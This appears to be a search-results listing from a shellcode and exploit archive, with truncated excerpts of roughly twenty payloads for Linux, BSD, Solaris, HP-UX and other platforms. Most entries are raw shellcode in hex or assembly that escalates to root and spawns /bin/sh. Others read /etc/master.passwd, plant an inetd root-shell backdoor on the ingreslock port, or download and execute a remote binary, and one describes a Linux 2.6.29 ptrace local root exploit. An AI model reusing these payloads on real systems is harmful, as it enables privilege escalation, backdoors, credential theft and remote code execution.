1131 matches found
linux/x86-64 - setuid0 + execve/bin/sh 49 bytes
linux/x86-64 setuid0 + execve/bin/sh 49 bytes. Shellcode exploit for linx86 platform / setuid0 + execve/bin/sh - just 4 fun. xi4oyu at 80sec.com main asm "xorq %rdi,%rdi\n\t" "mov $0x69,%al\n\t" "syscall \n\t" "xorq %rdx, %rdx \n\t" "movq $0x68732f6e69622fff,%rbx; \n\t" "shr $0x8, %rbx; \n\t" "pu...
Linux Kernel 2.6.29 - ptrace_attach() Race Condition Privilege Escalation
Linux Kernel 2.6.29 - ptraceattach Race Condition Privilege Escalation / GNU/Linux kernel 2.6.29 ptraceattach local root race condition exploit. ========================================================================== This is a local root exploit for the 2.6.29 ptraceattach race condition that...
FreeBSD i386/AMD64 Execve /bin/sh - Anti-Debugging
No description provided by source. / ELF - FreeBSD Execve /bin/sh - Anti-Debugging - i386/AMD64 c0d3z3r0 [email protected] ; [email protected] http://anderson.hacknroll.com http://blog.hacknroll.com \x7f\x45\x4c\x46\x01\x01\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00...
FreeBSD i386/AMD64 Execve /bin/sh - Anti-Debugging
FreeBSD i386/AMD64 Execve /bin/sh - Anti-Debugging. Shellcode exploit for freebsdx86 platform / ELF - FreeBSD Execve /bin/sh - Anti-Debugging - i386/AMD64 c0d3z3r0 http://anderson.hacknroll.com http://blog.hacknroll.com \x7f\x45\x4c\x46\x01\x01\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00...
FreeBSD i386/AMD64 Execve /bin/sh - Anti-Debugging
Exploit for freebsd/x86 platform in category shellcode ================================================== FreeBSD i386/AMD64 Execve /bin/sh - Anti-Debugging ================================================== / ELF - FreeBSD Execve /bin/sh - Anti-Debugging - i386/AMD64 c0d3z3r0 andersonunderground...
CSO/x86 - execve("/bin/sh", ..., NULL) - 43 bytes
No description provided by source. / minervini at neuralnoise dot com c 2005 SCOSV scosysv 3.2 5.0.7 i386, execve"/bin/sh", ..., NULL; / include "sys/types.h" include "stdio.h" char scode = "\x31\xc9" // xor %ecx,%ecx "\x89\xe3" // mov %esp,%ebx "\x68\xd0\x8c\x97\xff" // push $0xff978cd0...
Hp-ux - execve(/bin/sh) - 58 bytes
No description provided by source. / Hp-Ux execve of /bin/sh by K2 / uchar shellcode = "\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40" "\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"...
NetBSD/x86 - execve(/bin/sh) - 68 bytes
No description provided by source. / NetBSD execve of /bin/sh by humble of Rhino9 / char shellcode = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2" "\x89\x56\x07" "\x89\x56\x0f" "\x89\x56\x14" "\x88\x56\x19" "\x31\xc0" "\xb0\x3b" "\x8d\x4e\x0b" "\x89\xca" "\x52" "\x51" "\x53" "\x50"...
Solaris/x86 - add services and execve inetd - 201 bytes
No description provided by source. / Solaris/x86 Just execve's the following: "echo "ingreslock stream tcp nowait root /bin/sh sh -i"/tmp/x;" "/usr/sbin/inetd -s /tmp/x; /bin/rm -f /tmp/x"; for a trivial remote bd. Used in a few old Solaris/x86 remote exploits. / char c0de =...
FreeBSD/x86 - setuid(0)&execve({"//sbin/ipf","-Faa",0},0); - 57 bytes
No description provided by source. ; sm4x - 2008 ; setuid0; execve"//sbin/ipf", "//sbin/ipf", "-Faa", 0, 0; ; 57 bytes ; FreeBSD 7.0-RELEASE global start start: main: ; --------------------- setuid 0 xor eax, eax xor ecx, ecx push eax push eax mov al, 0x17 int 0x80 ; --------------------- -Faa xo...
BSD/ppc - execve(/bin/sh) - 128 bytes
No description provided by source. / Linux PPC shellcode execve of /bin/sh by Palante / long shellcode = / Palante's BSD PPC shellcode w/ NULL/ 0x7CC63278, 0x2F867FFF, 0x41BC005C, 0x7C6802A6, 0xB0C3FFF9, 0xB0C3FFF1, 0x38867FF0, 0x38A67FF4, 0x38E67FF3, 0x7CA52278, 0x7CE72278, 0x7C853A14, 0x7CC419A...
NetBSD/x86 - setreuid(0, 0); execve("/bin//sh", ..., NULL); - 29 bytes
No description provided by source. / minervini at neuralnoise dot com c 2005 NetBSD/i386 2.0, setreuid0, 0; execve"/bin//sh", ..., NULL; note: unsafe shellcode, but 29 bytes long; doesn't work if eax & 0x40000000 != 0; / include "sys/types.h" include "stdio.h" include "string.h" char scode = "\x9...
FreeBSD/x86 - execve(/bin/cat & /etc/master.passwd) - 65 bytes
No description provided by source. ; sm4x 2008 ; /bin/cat /etc/master.passwd ; 65 bytes ; FreeBSD 7.0-RELEASE global start start: xor eax, eax ; --- setuid0 push eax push eax mov al, 0x17 int 0x80 ; --- setup /etc/master.passwd jmp short loadfile ok: pop esi ; setup /bin/cat push eax push...
BSD/32bits - Passive Connection - 126 bytes
No description provided by source. ; Passive Connection Shellcode ; ; Coded by Scrippie - [email protected] - http://b0f.freebsd.lublin.pl ; Buffer0verfl0w Security ; Why? This evades firewalls... ; ; YES, this is for NASM, I detest AT&T syntaxis - it's gross and unreadable ; ; This is the FreeBSD...
BSD/x86 - setuid/execve - 30 bytes
No description provided by source. / $Id: setuid-bsd.c,v 1.6 2004/06/02 12:22:30 raptor Exp $ setuid-bsd.c - setuid/execve shellcode for BSD/x86 Copyright c 2003 Marco Ivaldi [email protected] Short setuid0 and /bin/sh execve shellcode based on esdee's code. Tested on OpenBSD and FreeBSD. / ...
BSD/x86 - execve(/bin/sh) - 27 bytes
No description provided by source. / execvesh.c by n0gada 27 bytes. / include "stdio.h" char shellcode= "\xeb\x0d\x5f\x31\xc0\x50\x89\xe2" "\x52\x57\x54\xb0\x3b\xcd\x80\xe8" "\xee\xff\xff\xff/bin/sh"; int mainvoid int ret; printf"%d\n",strlenshellcode; ret = int &ret+2; ret = intshellcode; return...
BSD/x86 - execve(/bin/sh) & setuid(0) - 29 bytes
No description provided by source. / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 29 bytes. -setuid0; -execve/bin/sh; / char shellcode= "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\xb0\x17" // mov $0x17,%al "\x50" // push %eax "\xcd\x80" // int $0x80 "\x50" // push %eax...
Linux/x86 - HTTP/1.x GET, Downloads & execve()
No description provided by source. / linux/x86 - HTTP/1.x GET, Downloads and execve - 111 bytes+ This shellcode allows you to download a ELF executable straight off a standard HTTP server and launch it. It will saved locally it into a filename called 'A' in the current directory. CONFIGURATION Th...
Linux/sparc - [setreuid(0,0); execve() of /bin/sh] - 64 bytes
No description provided by source. / Linux/SPARC setreuid0,0; execve of /bin/sh shellcode. / char c0de = / anathema [email protected] / / setreuid0,0; / "\x82\x10\x20\x7e" / mov 126, %g1 / "\x92\x22\x40\x09" / sub %o1, %o1, %o1 / "\x90\x0a\x40\x09" / and %o1, %o1, %o0 / "\x91\xd0\x20\x10" / ta...
Linux/x86 - execve(/bin/sh) - 24 bytes
No description provided by source. / [email protected] execve/bin/sh. 24 bytes. es lo mas chica que se puede hacer. / char shellcode= "\x31\xc0" // xorl %eax,%eax "\x50" // pushl %eax "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e "\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f "\x89\xe3" // mov...